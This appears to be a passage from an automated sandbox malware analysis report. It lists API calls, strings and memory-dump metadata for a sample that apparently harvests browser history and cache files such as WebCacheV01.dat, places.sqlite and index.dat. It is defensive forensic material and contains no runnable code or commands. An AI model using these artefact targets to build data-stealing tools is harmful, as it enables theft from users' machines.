                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2911713577-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                    • API String ID: 2705122986-2036018995
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                    • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                                    • String ID: }A
                                                                                                                                                                                                                    • API String ID: 1821831730-2138825249
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                                                    • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                                                    • API String ID: 0-1445880494
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                      • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1042154641-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                      • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2947809556-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                    • API String ID: 3093078384-467022611
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 839530781-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3831604043-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1631957507-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00415358
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: realloc
                                                                                                                                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                    • API String ID: 471065373-2134078882
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
